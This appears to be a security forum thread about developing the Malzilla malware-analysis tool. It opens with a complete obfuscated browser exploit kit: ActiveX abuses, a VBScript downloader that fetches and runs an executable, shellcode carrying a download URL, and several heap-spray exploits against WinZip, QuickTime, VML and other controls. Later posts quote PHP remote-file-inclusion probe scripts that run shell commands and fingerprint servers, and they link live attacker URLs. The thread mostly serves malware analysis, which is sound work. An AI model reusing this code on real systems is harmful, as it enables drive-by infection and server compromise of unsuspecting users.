var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" & tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}
if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location="exploits/x9.php?zenturi=1";}catch(e){}
}
var nop='90',noc='0C',scf='F';var shellco='%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2e7e%u7865%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D%u3633%u3935%u3433%u3838%u2630%u3D65';
if(!success){
var obj=null;
try{
obj=document.createElement("object");
obj.setAttribute("classid","clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F");
if(obj){
var mystring=unescape(shellco+"%u3731");
var hbs=0x100000,sss=hbs-(mystring.length*2+0x38);
var hb=(0x0c0c0c0c-hbs)/hbs;
var myvar=unescape("%u"+noc+noc+"%u"+noc+noc);
var ss=myvar;
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
var m=new Array();
for(i=0;i<hb;i++)m[i]=ss+mystring;
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
}
}catch(e){}
}
if(!success){
obj=document.write('<iframe src="exploits/x12b.php?o=2&t=1220309190&i=1365934880" width=0 height=0></iframe>');
}
if(!success){
var repl=new Array("cl","-");
try{
obj=document.createElement("object");
obj.setAttribute(repl[0]+"assid",repl[0]+"sid:2F542A2E"+repl[1]+"EDC9-4BF7-8CB1-87C9919F7F93");
var mystring=unescape(shellco+'%u3331');
var myvar = unescape("%u"+noc+noc+"%u"+noc+noc);
var bblock = myvar;
var sspace = 20 + mystring.length;
while (bblock.length < sspace) bblock += bblock;
var fblock = bblock.substring(0,sspace);
var block = bblock.substring(0,bblock.length - sspace);
while (block.length + sspace < 0x40000) block = block + block + fblock;
var mem = new Array();
for (i=0; i<400; i++) mem[i]=block+mystring;
var buf = '';
while (buf.length < 32) buf = buf + unescape("%"+noc);
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}catch(e){}
}
if(!success){
var target1=document.createElement("object");
target1.setAttribute("classid","clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277");
var target2=document.createElement("object");
target2.setAttribute("classid","clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
var mystring=unescape(shellco+'%u3031');
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigblock=myvar;
var slspace=20+mystring.length;
while(bigblock.length<slspace)bigblock+=bigblock;
var fillblock=bigblock.substring(0,slspace);
var block=bigblock.substring(0,bigblock.length-slspace);
while(block.length+slspace<0x40000)block=block+block+fillblock;
var memory=new Array();
for(x=0;x<800;x++)memory[x]=block+mystring;
buffer="\x0a";
add = buffer+buffer+buffer+buffer;
while(buffer.length<5000)buffer+=add;
try{target1.server=buffer;target1.initialize();target1.send()}catch(e){}
try{target2.server=buffer;target2.receive();}catch(e){}
}
if(!success){
var repl=new Array("cl","-");
try{
winzip=document.createElement("object");
winzip.setAttribute(repl[0]+"assid",repl[0]+"sid:A09AE68F"+repl[1]+"B14D-43ED-B713-BA413F034904");
var mystring=unescape(shellco+'%u2038');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
bigb=bigb.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
var test='';
for(i=1;i<231;i++)test+='A';
test+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
try{winzip.CreateNewFolderFromName(test)}catch(e){}
}catch(e){}
}
if(!success){
var repl=new Array("ti","bj");
try{
var test=eval("new Ac"+repl[0]+"veXO"+repl[1]+"ect('QuickTime.QuickTime')");
var mystring=unescape(shellco+'%u2037');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
hblocks=(hstoaddr-0x400000)/hbsize;
bigb=bigb.substring(0,spslsize/2);
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="src" value="exploits/x7b.php"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');}
catch(e){}
}
if(!success){
try{
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E");
var hstoaddr=0x05050505;
var mystring=unescape(shellco+'%u2033');
var hbsize=0x400000;
var plsize=mystring.length*2;
var spslsize=hbsize-(plsize+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var spsl=myvar;
while(spsl.length*2<spslsize)spsl+=spsl;
var spsl=spsl.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(i=0;i<hblocks;i++)memory[i]=spsl+mystring;
var ssrt=' method="';
for(i=0;i<10437;i++)ssrt+='ԅ';
document.write('<html xmlns:v="urn:schemas-microsoft-com:vml"><object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\\:*{behavior:url(#VMLRender);}</style><v:rect style="width:120pt;height:80pt" fillcolor="red"><v:fill'+ssrt+'"></v:rect></v:fill>');
}catch(e){}
}
if(!success){
var repl=new Array("eb","ie","ol","co","et","li");
try{
var wvfi="W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.1";
var wvfio=new ActiveXObject(wvfi);
var mystring='%u'+nop+nop+shellco+'%u2032';
while(mystring.length<3072)mystring+="%u"+noc+noc;
mystring=unescape(mystring);
var myvar=unescape("%u"+noc+noc);
var bigb=myvar;
while(bigb.length<=0x100000)bigb+=bigb;
var memory=new Array();
for(var i=0;i<120;i++)memory[i]=bigb.substring(0,0x100000-mystring.length)+mystring;
for(var i=0;i<1024;i++){
var wvfio=new ActiveXObject(wvfi);
eval("try{wvfio.s"+repl[4]+"S"+repl[5]+"ce(0x7ffffffe,0,0,202116108);}catch(e){}");
var wvfio=new ActiveXObject(wvfi);
}
}catch(e){}
}
-
I've got it set to Override :)
-
Please use "Leave as is" as long as it give results. Use the other two options just in case the "Leave as is" does not work.
-
bobby what are your pc specs and how long did it need to run for? This takes a while... and if you go to other windows and then back to malzilla's window it gives the access violation.
-
I use 2GHz AMD Athlon XP with 1GB RAM. Pretty old configuration for today's standards.
In your example, it creates some 22.000 temp files in eval_temp folder (every time eval() is called, a file is created, and it contains the arguments of eval() function). After that, Malzilla will eliminate duplicates between temp files, so it will remain less than 10 files after that (usually 3-5 files).
Most of the temp files are just a couple of bytes long (<100 bytes), but every file will occupy one whole cluster (usually 4kb), so you need 80mb free space on partition for the temp files.
To deobfuscate this script, my PC needs some 2-3 minutes (no anti-virus app is running, or some other heavy-duty service). Partition is NTFS, not compressed, file indexing is turned off.
I will try to reproduce the bug you got.
btw. are you running more than one instance of Malzilla at once? Both working on deobfuscation at the same time?
-
Another odd bug with v1.0. Right click-exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.
Malzilla
-------
(X)
[ok]
TJS
-
Actually, I don't know what I did-- but malzilla refuses to exit altogether! :P Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer) :)
-
I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.
-
On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.
http://www.google.co.uk/
Also, if you click Run Script on decoders tab when there is no script, it will say script compiled, but the run script and debug button will turn grey like it is busy. So you cannot use it, until you close malzilla and re-open it.
-
I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
Only remaining problem is if the decoding get stuck, I can't do anything like Cancel button.
-
Please download this build from here:
http://malzilla.sourceforge.net/builds/
-
Just downloaded the latest one, which appears may have a ftp problem. I was unable to reterive the script from this link, ftp://216.12.192.109/ids.txt
The script at the link was then reterived using the first malzilla version incorporating ftp.
-
Works fine here. Can you test with WGET or with older version of Malzilla again?
Maybe is a temporary server glitch or something like that.
-
Prolly just a server glitch ..... script was snagged without issue here :)
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
-
Just tried grabbing it with the new version, this time it worked fine.
Must have been a server burp.
-
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
-
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).
-
Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating :(
-
Looking forward to it dude :)
-
Keep up the good work :)
-
Any chance for in program updating? :), i always hated having to dl new versions manually :P
-
@Kayrac
Pretty much impossible with SourceForge's organization of mirrors.
@all
1.1.0 is uploaded to the servers. Mirrors will probably need some time to synchronize.
Now I need to sit down and write some documentation and tutorials on new features.
-
Cheers dude :)
-
Clicking detect in the Kalimero tab with nothing in the box causes MalZilla to freeze.
On the Misc Decoders tab, it would be nice to have a little checkbox or radio button to enable/disable the "Override default delimiter" option. So that if it is enabled whatever is in the box will be the delimiter, even if nothing is in the box. This would be useful for when you got hex without the %. Or perhaps an insert character at every increment, like UltraEdit. These are not important features though, so if they are too time consuming are could incorporate bugs, don't worry ;)
-
Thanks.
@JohnC
Interesting, Kalimero freezes in a lot of situations. I didn't tested its robustness. I have used it just for getting HTML objects for LuckySploit.
About working without delimiter in Misc decoders - it is possible to do for encodings with fixed length of a number (e.g. hex), but it can't be done as general rule because of e.g. decimal numbers (1,10,100) where the length of one member can be 1 to 3.
You can insert a delimiter by using PScript, and example script for such task is already included with Malzilla (I believe it was added with Malzilla 0.9.3 or even 0.9.2.1).
It is not a problem to do insertion of delimiter, or decoding without delimiter. I'll wait a couple of days to see if there is more bug reports, and I'll push another release.
-
Localized and fixed the Kalimero bug.
It was a stupid cleaning routine that was used to remove empty rows from the array - there was no exit if the array didn't have any row.
@JohnC
Please do some testing with caching HTTP headers (your request for this version)
btw. there is an option on Settings > Download tab > Add project info to saved files. That would also store all the relevant data into saved HTML documents, and this option is also present in Malzilla for very long time.
-
"Add project info to saved files" is enabled by default in MalZilla 1.1.0 but I'm not sure where I should be looking for the HTML files, I don't see them. When I load a cached page, I don't get the headers.
Also I noticed this strange bug.
(http://img82.imageshack.us/img82/8319/67773691dy2.png)
The site in question is an NX domain site, so MalZilla couldn't access it. The cache file d41d8cd98f00b204e9800998ecf8427e is 0 bytes long. This is because MalZilla tries to save a cache for sites that don't work aswell it seems. If you test MalZilla trying to access any site that doesn't exist, it will create the 0 byte file in the cache folder, and if you try to load it, it will load the empty file. However if you visit another site which doesn't work it will not add this site to the cache because it has the same md5 hash as the other site. But if you try and open the original cached page, it will then give you that error.
And another little bug.
(http://img359.imageshack.us/img359/6370/61785352yx7.png)
Clear the URL box. Expand the url box to see all visited urls but don't click any, so that the url box is still empty. Then click "Load from cache". It will produce the Debug error message.
-
bobby, is version 1.1.0 available at anysite other than sourceforge, everytime i try and DL it, it crashes on me (not the first time ive had this problem with sourceforge !!)
-
http://www.malwaredomainlist.com/malzilla_1.1.0.zip
-
Thanks John ;D
-
Regarding SF downloads in general / for future reference...
Assuming that you know the exact name of the package you wanna download,
eg."malzilla_1.1.0.zip" in this case,then you can substitute the mirroring server's name as below...
http://heanet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://dfn.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://surfnet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://kent.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://switch.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://ovh.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
And it goes on...don't remember by heart all the available mirrors there... ;-)
Alternatively,someone could use the following...
but I think this one takes a bit more to update/mirror the revisions,not really sure about that:
http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/m/ma/malzilla/
-
@JohnC
About 0-byte files - it is so by design. Can you suggest better behavior which better suits your needs?
About "debug" message, it is from function that makes corrections in URL (hxxp > http and fxp>ftp).
I've removed the message.
btw. these is some features of Malzilla that I still didn't documented.
Command-line parameters:
-url "www.aa.aa" - open Malzilla and put the URL in URL box - this goes through URL fix routine mentioned above, so you can supply hxxp://... links
-html file.ext - open Malzilla and load file in Download tab
-js file.ext - open Malzilla and load file in Decoder tab
I'm still looking for solution to integrate Malzilla with browsers, so that the browser open Malzilla if hxxp link is clicked.
btw. Today I have done a lot of fixes (how dumb I was with handling of Unicode...)
Will push a bugfix release as soon as possible (0-bytes problem mentioned by JohnC need to be fixed when I get feedback from JohnC).
-
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file
@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.
-
@Orac
Indeed, SF can be a PITA sometimes. I'll see what I can do (need to read the agreement with SF again, to see not to do something against the agreement).
I get the best results when downloading from Ireland mirror (can't recall the name).
-
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file
@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.
It just seems to save the webpage, there aren't any HTTP headers saved with it.
-
Hmmm... you just found another bug. It did work.... :(
-
httpS bug
Using malzilla i attempted to reterive, https://www.ba-sat.com/sunshop/images/products/idfeel.txt and it gave me a 500 responce, but i was able to grab the link using other means.
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
Of course why anyone would use a https link for a RFI is another question ::)
-
...worked fine for me at the very exact moment?Using v1.1.0 obviously...
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1= @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used = ConvertBytes($all1-$free1);
$free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}
echo "FeeLCoMz".$sf."<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) { return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
} else { $res = "NULL"; }
}
return $res;
}
exit;
?>
PS:That's what happens to people that prefer using Vista instead of XP... ;-)
-
Since reading Sow`s post, ive reinstalled V1.1.0 and it still gives me a 500 responce on that link, strange.
-
Works fine here. Either geolocation or you are banned from the server (or your proxy is banned if you are using one).
-
https://www.ba-sat.com/sunshop/images/products/idfeel.txt
GET /sunshop/images/products/idfeel.txt HTTP/1.0
Host: www.ba-sat.com:443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept-Encoding: gzip
Works fine in my browser.
-
I get the best results when downloading from Ireland mirror (can't recall the name).
Tis HEANet ;)
@John,
I get the same error for that one, and it works fine in the browser and in vURL DE;
-
I was talking with Orac about it earlier on irc...we didn't manage to come up with a solution.
It's not dns cache (ipconfig /flushdns),that's for sure.
It's not firewall rules,again,that's for sure.
Then again,the error code returned is 500...which is kinda weird:
because if we assume the fault is not in the server configuration itself,
then the only thing that comes to mind is that the packets,
don't get transmitted correctly from the client itself...thereby triggering that error.
bobby says "either geolocation or you are banned from the server",
which pretty much seems to be the most reasonable explanation to me.
If not,then...not many things come to mind on how to solve this,anyway...
1)Capture two different pcap files in order to compare what's being going on...
one via whatever browser that responds 200 ok,one via Malzilla that returns 500.
2)Trace what Malzilla does when the annoying 500 returns,either via OllyDbg,
or even via a "simpler" api tracer out there...here's a small example list:
http://www.teamfurry.com/index.php?topic=10.msg21#msg21
3)Maybe the server itself doesn't implement ssl correctly?
Here's all the ssl algos that this server supposedly implements/understands...
-
"either geolocation or you are banned from the server"
Cant be either of those as i can get the link using a browser.
Pcap logs show a zero byte TCP stream when using malzilla, the TCP stream is complety normal when using a broswer.
I tried using malzilla with the same UA as my browser, that didnt make any differnce either.
I think its either something in the server, or the https request from malzilla isnt being accepted for some reason.
-
I've found some reports that OpenSSL library is not working properly on WinXP SP3, so this bug maybe affects Vista too.
Malzilla is using OpenSSL library to manage HTTPS protocol (libeay32.dll in Malzilla's folder).
Version supplied with Malzilla is 0.9.8.7 (0.9.8g)
If you find a newer version, please replace the old dll.
You may try to get the files from here (extract them from the installer):
http://www.slproweb.com/products/Win32OpenSSL.html
-
Pcap logs show a zero byte TCP stream when using malzilla
...if Wireshark doesn't report much stuff regarding the ssl handshake/algo negotiation in question,
there are couple of alternatives I can think of...or actually,
it's one alternative option,that is to use an ssl 'debugging' proxy instead...
with ssldump as the first one that comes to mind.
Note though that I've never tried to build ssldump under win32... :-\
http://www.rtfm.com/ssldump/
What I've been in the need of compiling and have used successfully under win32 in the past,
is couple of simpler ssl diagnostic proxy implementations...Mozilla's own ssltap namely:
http://www.mozilla.org/projects/security/pki/nss/tools/ssltap.html
And sshole as well (it had built cleanly under cygwin)...
http://thekonst.net/en/sshole
-
Found the answer from bobbys link
If you discover 0.9.8i doesn't work (saying something like "The application did not start") and you are running XP SP3 and have installed the VC++ 2008 Redistributables, then revert to XP SP2 and make it a corporate policy to stop using the latest bleeding-edge software from Microsoft.
Guess what, this machine is XP SP3
:(
-
Just an FYI Bobby, Malzilla is showing the following on initial launch? (loaded without issue after clicking OK)
-
Thats the part of OpenSSL. Malzilla uses this dll to handle https links.
Do you have another libeay32.dll in your path or just the one dll in Malzilla's folder?
-
Just the one of them :)
-
Malzilla 1.2.0 updated.
I still do not have solution for libeay32.dll
It simply does not work on the systems where newer VS redistributable files are installed.
XP SP3 contains these by default.
This version of VS 2008 redistributables should work:
http://www.microsoft.com/downloads/details.aspx?familyid=9B2DA534-3E03-4391-8A4D-074B9F2BC1BF
I also have a new tutorial prepared, but I have troubles with uploading it to the SourceForge (and not only me, according to SF bug-tracker).
-
Cheers dude :)
-
I've had encountered numerous troubles when VS 2005 came out,
with it's so called 'side-by-side assemblies'...
having often to mess around with custom-made manifest files etc.,
and even then,not always successfully,
as there were way too many incorrectly compiled programs distributed out there...
But now I was just reading the page over at Shining Light,and it says:
Although there is a "newer version" of this installer, this is the correct version to install.
That's kinda weird...because assuming the .exes are compiled correctly in the first place,
newer Visual C++ redistributables shouldn't 'break' them...at the worst case scenario,
a .manifest file should be created to point/redirect to the newer libraries:
http://msdn.microsoft.com/en-us/library/aa375632.aspx
...should I assume that older OpenSSL dlls were not compiled with VS2005/2008?
Question is: could OpenSSL be compiled statically into Malzilla.exe itself,
in order to see if the problem persists?Not sure if this is possible...plus,one more idea:
http://www.stunnel.org/download/stunnel/win32/stunnel-4.26-installer.exe
libeay.dll included there is OpenSSL 0.9.8i -> build 15 Sep 2008 with gcc... ;)
-
Using 0.9.8i cleared the SSL error I was receiving :)
-
Lol -> gcc p0wned vs studio,ha-ha! :)
Nice thing is that 0.9.8i is also newer than Shining Light's 0.9.8g,
although from what I see in their changelog,it's mainly crash related bugfixes...
http://www.openssl.org/news/vulnerabilities.html
Edit:Shining Light has updated to 0.9.8i,my mistake...
as I was looking for older versions as well via WebArchive,he-he ;-)
http://www.slproweb.com/products/Win32OpenSSL.html
-
@sowhat-x
I'm looking into other than OpenSSL solutions (there is a couple more SSL solutions out there).
AFAIK, OpenSSL is the most complete solution. I will need to see how useful/complete are the other ones.
@MysteryFCM
Thanks, I will try that.
btw. which Windows version you use?
I have one PC with Win XP SP3, and I will do some testing on it tomorrow.
On this PC that I use for development, I use SP2.
I have bad experiences from updating SP1 > SP2 (network didn't work anymore), and I do not dare to reinstall Windows again if I get problems with installing SP3 (too many tools and settings need to be installed/setup).
I have attached the new tutorial here. Who knows how much time will SF.net need to fix up the problems.
-
@Bobby,
I've got a machine with XP SP2 and a machine with XP SP3 :)
-
...just read the tutorial...that's really magic there,
need to read it couple of times more in order to get in the flow of it,
damn it -> i'd dare saying it's better than unpacking! ;D
Irrelevant...does "Kalimero" word mean something by itself?
Or was it a randomly chosen/made-up term?
I'm asking because "Kalimera" in greek means "Good Morning"... :)
-
Kalimero = Calimero = toon character:
http://en.wikipedia.org/wiki/Calimero
We use K instead of C here, as we always read C as Tz (almost like in Tzatziki).
If you need to read it as K (like in the word "Combination"), you need to write K :)
@MysteryFCM
And you was getting that error message on both of them?
-
I was, yep
-
A feature suggestion: ability to POST instead of GET. With a little box to put the POST data, (in hex perhaps so that you can allow for newline characters etc). which works pretty much like GET does so that you can save to file whatever data is returned by the server.
-
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.
-
Because we don't know what is going to be required, the best method for the POST, would be a simple box, where the user fills in the suspected vars required? This would then be included in the post data.
-
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.
For the time being, that is what I need :)
-
Upgraded to the latest version. Somehow my error for libeay32.dll went away! Working great.
-
Hmmm... POST does not seems to be so trivial.
It can also send line breaks.
So, we actually need an edit box, not one-line box for input.
Also, MIME type should be specified at sending POST, and there is a whole bunch of possible MIME types that one may want to send.
A file can also be sent in POST, and that would be another problem because it is not so generic thing like just sending some strings.
So, I'm thinking about having grid interface with 3 columns:
1. type (string or file)
2. name
3. value (just for string type)
If we do not need to POST files, the whole thing will be a lot easier to implement.
-
Here is a rudimentary POST implementation (file attached).
It does just the application/x-www-form-urlencoded POST method.
That means, when the POST dialog appears, one need to enter the POST data in the form:
name1=value1&name2=value2&...
Do not put the question mark at the beginning of the POST data.
URL where the POST will be sent needs to be put in regular URL box.
Please, you need to see the source of the page where a form requesting the data was, so that you can see the link where to POST the data.
Example:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Untitled</title>
</head>
<body>
